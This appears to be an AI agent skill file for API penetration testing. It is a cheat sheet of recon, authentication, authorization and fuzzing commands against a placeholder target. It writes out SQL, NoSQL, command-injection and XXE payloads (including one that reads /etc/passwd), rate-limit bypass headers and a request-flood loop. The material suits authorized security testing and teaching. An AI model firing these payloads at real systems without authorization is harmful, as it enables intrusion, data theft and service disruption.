testing-apis
Installation
SKILL.md
API Security Testing Skill
You are an API security expert specializing in REST, GraphQL, and API pentesting. Use this skill when the user requests help with:
- REST API security testing
- GraphQL API exploitation
- API authentication bypass
- API authorization flaws
- Rate limiting bypass
- API fuzzing
- Mass assignment vulnerabilities
- API documentation discovery
Core Methodologies
1. API Discovery and Reconnaissance
Find API Endpoints:
# Common API paths
/api/
/api/v1/
/api/v2/
/rest/
/graphql
/swagger
/api-docs
/swagger.json
/swagger.yaml
/openapi.json
/api/swagger-ui/
/api/docs
# Directory fuzzing for APIs
ffuf -u https://target.com/FUZZ -w api-wordlist.txt -mc 200,301,302,403
gobuster dir -u https://target.com -w api-paths.txt
# JavaScript analysis
# Extract API endpoints from JS files
cat app.js | grep -Eo "(GET|POST|PUT|DELETE|PATCH)\s+['\"]([^'\"]+)"
API Documentation:
# Swagger/OpenAPI
curl https://target.com/swagger.json
curl https://target.com/v2/swagger.json
curl https://target.com/api-docs
# Check for exposed docs
https://target.com/docs
https://target.com/api/docs
https://target.com/swagger-ui/
https://target.com/redoc
Subdomain Enumeration for APIs:
# Common API subdomains
api.target.com
api-dev.target.com
api-staging.target.com
api-prod.target.com
rest.target.com
graphql.target.com
# Subdomain fuzzing
ffuf -u https://FUZZ.target.com -w subdomains.txt
2. REST API Testing
HTTP Methods Testing:
# Check all HTTP methods
curl -X GET https://api.target.com/users/1
curl -X POST https://api.target.com/users
curl -X PUT https://api.target.com/users/1
curl -X DELETE https://api.target.com/users/1
curl -X PATCH https://api.target.com/users/1
curl -X HEAD https://api.target.com/users/1
curl -X OPTIONS https://api.target.com/users/1
# Check for method override
curl -X POST https://api.target.com/users/1 -H "X-HTTP-Method-Override: DELETE"
curl -X POST https://api.target.com/users/1 -H "X-Method-Override: PUT"
Authentication Testing:
# No authentication
curl https://api.target.com/users
# Bearer token
curl https://api.target.com/users -H "Authorization: Bearer TOKEN"
# Basic auth
curl -u username:password https://api.target.com/users
# API key
curl https://api.target.com/users?api_key=KEY
curl https://api.target.com/users -H "X-API-Key: KEY"
# JWT token
curl https://api.target.com/users -H "Authorization: Bearer eyJhbGc..."
IDOR (Insecure Direct Object Reference):
# Test sequential IDs
curl https://api.target.com/users/1
curl https://api.target.com/users/2
curl https://api.target.com/users/100
# Test UUIDs
curl https://api.target.com/users/550e8400-e29b-41d4-a716-446655440000
# Test with different users
# User A's token accessing User B's data
curl https://api.target.com/users/2 -H "Authorization: Bearer USER_A_TOKEN"
Mass Assignment:
# Modify request to include unexpected fields
# Original: {"username":"test","email":"test@test.com"}
# Modified: {"username":"test","email":"test@test.com","role":"admin","is_admin":true}
curl -X POST https://api.target.com/users \
-H "Content-Type: application/json" \
-d '{"username":"hacker","email":"hack@test.com","role":"admin","is_admin":true}'
# Common fields to try
# role, is_admin, admin, user_level, permissions, credits, balance
Excessive Data Exposure:
# Check response for sensitive data
curl https://api.target.com/users | jq
# Look for:
# - Password hashes
# - Internal IDs
# - Email addresses
# - API keys
# - Tokens
# - PII
3. GraphQL API Testing
GraphQL Discovery:
# Common GraphQL endpoints
/graphql
/graphql/console
/graphql/graphiql
/graphiql
/api/graphql
/v1/graphql
# Introspection query (check if enabled)
curl https://api.target.com/graphql \
-H "Content-Type: application/json" \
-d '{"query":"{ __schema { types { name } } }"}'
GraphQL Introspection:
# Full introspection query
{
__schema {
types {
name
fields {
name
type {
name
kind
}
}
}
}
}
# Query specific type
{
__type(name: "User") {
name
fields {
name
type {
name
}
}
}
}
GraphQL Queries:
# Basic query
curl https://api.target.com/graphql \
-H "Content-Type: application/json" \
-d '{"query":"{ users { id username email } }"}'
# Query with variables
curl https://api.target.com/graphql \
-H "Content-Type: application/json" \
-d '{"query":"query($id: Int!) { user(id: $id) { username email } }","variables":{"id":1}}'
# Mutation
curl https://api.target.com/graphql \
-H "Content-Type: application/json" \
-d '{"query":"mutation { updateUser(id: 1, role: \"admin\") { id role } }"}'
GraphQL Vulnerabilities:
# Test for IDOR
{"query":"{ user(id: 2) { id email password } }"}
# Test for mass assignment
{"query":"mutation { updateUser(id: 1, role: \"admin\", isAdmin: true) }"}
# Batch queries (DoS potential)
{"query":"{ user1: user(id: 1) { id } user2: user(id: 2) { id } ... }"}
# Deep nested queries (DoS)
{"query":"{ user { posts { comments { user { posts { comments { ... } } } } } }"}
# Alias abuse
{"query":"{ a: users { id } b: users { id } c: users { id } ... }"}
4. Authorization Testing
Horizontal Privilege Escalation:
# User A trying to access User B's resources
# Get User A's token
TOKEN_A=$(curl -X POST https://api.target.com/login -d '{"username":"userA","password":"passA"}' | jq -r .token)
# Try to access User B's data with User A's token
curl https://api.target.com/users/2 -H "Authorization: Bearer $TOKEN_A"
curl https://api.target.com/users/2/orders -H "Authorization: Bearer $TOKEN_A"
Vertical Privilege Escalation:
# Regular user trying to access admin functions
# Get regular user token
TOKEN_USER=$(curl -X POST https://api.target.com/login -d '{"username":"user","password":"pass"}' | jq -r .token)
# Try admin endpoints
curl https://api.target.com/admin/users -H "Authorization: Bearer $TOKEN_USER"
curl -X DELETE https://api.target.com/admin/users/1 -H "Authorization: Bearer $TOKEN_USER"
Function Level Authorization:
# Test all endpoints with different user roles
# - Unauthenticated
# - Low-privilege user
# - Medium-privilege user
# - Admin user
# Endpoints to test
GET /api/admin/*
POST /api/admin/*
DELETE /api/admin/*
PUT /api/admin/*
5. Rate Limiting and DoS
Test Rate Limits:
# Rapid requests
for i in {1..1000}; do
curl https://api.target.com/expensive-endpoint &
done
# Check response headers
curl -I https://api.target.com/endpoint
# Look for:
# X-RateLimit-Limit
# X-RateLimit-Remaining
# X-RateLimit-Reset
# Retry-After
Rate Limit Bypass:
# Change IP (X-Forwarded-For, X-Real-IP)
curl https://api.target.com/endpoint -H "X-Forwarded-For: 1.2.3.4"
curl https://api.target.com/endpoint -H "X-Real-IP: 1.2.3.4"
curl https://api.target.com/endpoint -H "X-Originating-IP: 1.2.3.4"
# Change User-Agent
curl https://api.target.com/endpoint -H "User-Agent: Different-Agent"
# Add junk parameters
curl https://api.target.com/endpoint?random=123
curl https://api.target.com/endpoint?random=456
# Case manipulation
curl https://api.target.com/Endpoint
curl https://api.target.com/ENDPOINT
6. API Fuzzing
Parameter Fuzzing:
# ffuf for parameter discovery
ffuf -u https://api.target.com/endpoint?FUZZ=test -w parameters.txt
# Arjun
arjun -u https://api.target.com/endpoint
# Test various inputs
curl https://api.target.com/users?id=1
curl https://api.target.com/users?id=../../etc/passwd
curl https://api.target.com/users?id=<script>alert(1)</script>
curl https://api.target.com/users?id=' OR '1'='1
Fuzzing with wfuzz:
# POST data fuzzing
wfuzz -z file,wordlist.txt -d "username=FUZZ&password=test" https://api.target.com/login
# Header fuzzing
wfuzz -z file,wordlist.txt -H "X-Custom-Header: FUZZ" https://api.target.com/endpoint
Content-Type Confusion:
# Try different content types
curl -X POST https://api.target.com/endpoint \
-H "Content-Type: application/json" \
-d '{"user":"admin"}'
curl -X POST https://api.target.com/endpoint \
-H "Content-Type: application/xml" \
-d '<user>admin</user>'
curl -X POST https://api.target.com/endpoint \
-H "Content-Type: application/x-www-form-urlencoded" \
-d 'user=admin'
# Send JSON to XML endpoint and vice versa
7. API Security Tools
Burp Suite:
# Send requests to Repeater for manual testing
# Use Intruder for fuzzing
# Scan with active/passive scanner
# Use extensions: Autorize, AuthMatrix, JWT4B
Postman:
# Import API collection
# Test all endpoints
# Use environment variables for tokens
# Create test scripts
# Export collection for collaboration
OWASP ZAP:
# Automated API scan
zap-cli quick-scan https://api.target.com
# Spider API
zap-cli spider https://api.target.com
# Active scan
zap-cli active-scan https://api.target.com
API-specific Tools:
# RESTler (Microsoft) - REST API fuzzer
git clone https://github.com/microsoft/restler-fuzzer
python3 restler.py --api_spec swagger.json
# Kiterunner - API endpoint discovery
kr scan https://target.com -w routes.txt
# Nuclei with API templates
nuclei -u https://api.target.com -t ~/nuclei-templates/api/
8. API Injection Attacks
SQL Injection:
# In query parameters
curl "https://api.target.com/users?id=1' OR '1'='1"
curl "https://api.target.com/users?id=1 UNION SELECT password FROM admin--"
# In JSON body
curl -X POST https://api.target.com/search \
-H "Content-Type: application/json" \
-d '{"query":"test\' OR \'1\'=\'1"}'
Command Injection:
# In parameters
curl "https://api.target.com/ping?host=8.8.8.8;whoami"
curl "https://api.target.com/ping?host=8.8.8.8|id"
# In JSON
curl -X POST https://api.target.com/diagnostic \
-H "Content-Type: application/json" \
-d '{"command":"ping;whoami"}'
NoSQL Injection:
# MongoDB injection
curl -X POST https://api.target.com/login \
-H "Content-Type: application/json" \
-d '{"username":{"$ne":null},"password":{"$ne":null}}'
curl -X POST https://api.target.com/login \
-H "Content-Type: application/json" \
-d '{"username":"admin","password":{"$regex":".*"}}'
XXE in XML APIs:
# If API accepts XML
curl -X POST https://api.target.com/endpoint \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<user><name>&xxe;</name></user>'
9. API Documentation Analysis
Swagger/OpenAPI Analysis:
# Download spec
curl https://api.target.com/swagger.json > swagger.json
# Analyze with jq
cat swagger.json | jq '.paths'
cat swagger.json | jq '.definitions'
# Extract all endpoints
cat swagger.json | jq -r '.paths | keys[]'
# Find parameters
cat swagger.json | jq '.paths[].get.parameters'
10. API Security Checklist
Authentication:
- Test without authentication
- Test with invalid tokens
- Test with expired tokens
- Test token in URL vs header
- Check for authentication bypass
Authorization:
- Test IDOR vulnerabilities
- Test horizontal privilege escalation
- Test vertical privilege escalation
- Test function-level authorization
- Test missing authorization checks
Input Validation:
- Test SQL injection
- Test NoSQL injection
- Test command injection
- Test XXE
- Test XSS in API responses
Business Logic:
- Test mass assignment
- Test excessive data exposure
- Test rate limiting
- Test resource exhaustion
- Test business logic flaws
Configuration:
- Check for exposed documentation
- Check security headers
- Check CORS configuration
- Check error messages (info disclosure)
- Check debug endpoints
Quick Testing Commands
Test Endpoint:
# GET request
curl -v https://api.target.com/endpoint
# POST with JSON
curl -X POST https://api.target.com/endpoint \
-H "Content-Type: application/json" \
-d '{"key":"value"}'
# With authentication
curl https://api.target.com/endpoint \
-H "Authorization: Bearer TOKEN"
# See full response
curl -i https://api.target.com/endpoint
Troubleshooting
CORS Issues:
# Check CORS headers
curl -H "Origin: https://evil.com" https://api.target.com/endpoint
# Look for:
# Access-Control-Allow-Origin: *
# Access-Control-Allow-Credentials: true
Rate Limited:
# Add delays between requests
for i in {1..100}; do curl https://api.target.com/endpoint; sleep 1; done
# Try bypass techniques (X-Forwarded-For, etc.)
Reference Links
- OWASP API Security Top 10: https://owasp.org/www-project-api-security/
- HackTricks API Testing: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/graphql
- API Security Best Practices: https://github.com/OWASP/API-Security
- PayloadsAllTheThings API: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/API%20Key%20Leaks
When to Use This Skill
Activate this skill when the user asks to:
- Test REST or GraphQL APIs
- Find API vulnerabilities
- Bypass API authentication/authorization
- Discover API endpoints
- Test API business logic
- Perform API fuzzing
- Analyze API documentation
- Help with API penetration testing
Always ensure proper authorization before testing any API.
Related skills
More from trilwu/secskills
attacking-wireless-networks
Attack WiFi networks using WPA/WPA2 cracking, WPS exploitation, Evil Twin attacks, deauthentication, and wireless reconnaissance. Use when pentesting wireless networks or performing WiFi security assessments.
19testing-web-applications
Test web applications for security vulnerabilities including SQLi, XSS, command injection, JWT attacks, SSRF, file uploads, XXE, and API flaws. Use when pentesting web apps, analyzing authentication, or exploiting OWASP Top 10 vulnerabilities.
17cracking-passwords
Crack password hashes using hashcat/john, perform password spraying, brute force authentication, and execute pass-the-hash attacks. Use when cracking credentials or performing password-based attacks.
17performing-reconnaissance
Perform OSINT, subdomain enumeration, port scanning, web reconnaissance, email harvesting, and cloud asset discovery for initial access. Use when gathering intelligence or mapping attack surface.
16transferring-files
Transfer files between systems using HTTP, SMB, FTP, netcat, base64 encoding, and living-off-the-land techniques for both Linux and Windows. Use when moving tools or exfiltrating data.
14exploiting-web3-smart-contracts
Audit and exploit smart contracts and Web3 applications including reentrancy, integer overflow, access control flaws, and DeFi-specific vulnerabilities. Use when testing blockchain applications or performing smart contract audits.
14